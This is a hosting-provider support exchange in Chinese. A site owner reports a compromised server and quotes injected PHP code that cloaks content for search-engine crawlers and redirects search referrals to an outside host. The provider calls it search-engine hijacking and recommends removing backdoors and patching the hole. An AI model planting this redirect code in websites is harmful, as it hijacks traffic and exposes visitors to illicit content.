问:服务器最近被攻击,有的网站根目录被添加一些.PHP文件,有的主页 INDEX.PHP被修改了代码,比如在顶部添加了下边这个代码:
if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://40980.net/php/19.html");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']); foreach ($domain as $v) { if (strpos($fromurl,$v)!==false) { $target="http://40980.net/cp/tz.htm"; header("Location:".$target); exit; }}?><?php
网站也被百度检测中心报错,搜索的时候出现:
百度网址安全中心提醒您:该页面可能存在违法信息!
比如网站:www.zyhmzx.net 这个根目录的index.php就被加了上边那段代码
www.gzsjhm.com根目录被添加了几个.PHP文件,如图:
请教下这个被攻击和修改有什么办法修复和防护吗? 能不能帮忙解决下,谢谢
问:www.zyhmzx.net 这个根目录的index.php文件上边那段代码我前几天删了,今天打开看了又有了
答:您好
1、通过您提供的代码来看是搜索引擎劫持代码,可能是您程序被入侵导致,彻底解决方法是联系程序开发商帮您排查删除后门并修复漏洞,若不修复漏洞,仍有被入侵的可能。
2、您是铜牌服务,我司帮您查看了一下服务器方面并未发现被黑的情况,请你知悉。
2、该问题是程序方面问题,若需我司协助您清理挂马,请您提交对应工单:【主机租用/vps/云主机】—【站点设置】—【清理网站挂马代码和非法信息(一个站点)】,会涉及到费用,另外,我司只能帮您清理挂马,无法帮您修复漏洞,请您知悉,非常感谢你的支持!